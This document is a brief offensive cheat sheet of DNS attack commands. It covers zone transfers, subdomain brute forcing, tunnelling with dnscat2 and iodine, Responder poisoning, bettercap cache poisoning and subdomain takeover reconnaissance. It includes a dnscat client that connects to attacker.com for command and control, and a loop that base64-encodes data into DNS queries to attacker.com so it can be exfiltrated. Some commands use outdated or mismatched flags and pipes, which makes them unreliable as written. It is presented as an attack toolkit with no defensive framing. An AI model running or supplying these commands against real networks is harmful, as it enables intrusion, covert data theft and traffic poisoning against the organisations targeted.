🌐 DNS Attack Techniques

# DNS lookup
dig target.com ANY
nslookup target.com

# Zone transfer
dig axfr target.com @dns.server.com
dnsrecon -d target.com -a

# Subdomain enumeration
dnsenum target.com
dnsrecon -d target.com -t brt -D subdomains.txt

# Brute force
for i in $(cat wordlist.txt); do dig $i.target.com | grep -A 2 "ANSWER"; done

# DNS tunneling with dnscat2
# Server side
apt install dnscat2
dnscat2-server example.com

# Client side
dnscat --dns server=attacker.com --secret=secret123

# Iodine (IP over DNS)
iodined -f 10.0.0.1 tunneldomain.com

# Use DNS for C2
# DNS callbacks for data exfiltration
# Encode data in DNS queries
echo "data" | base64 | while read c; do dig $c.attacker.com; done

# LLMNR/NBT-NS poisoning (network level)
responder.py -I eth0 -w

# DNS cache poisoning
# Use ettercap or bettercap
bettercap -X --proxy -T target.com

# Subdomain takeover
# Find dangling DNS records
subfinder -d target.com | assetfinder --subdomain | httprobe
# Check for expired cloud resources

# Modify DNS records via compromised registrar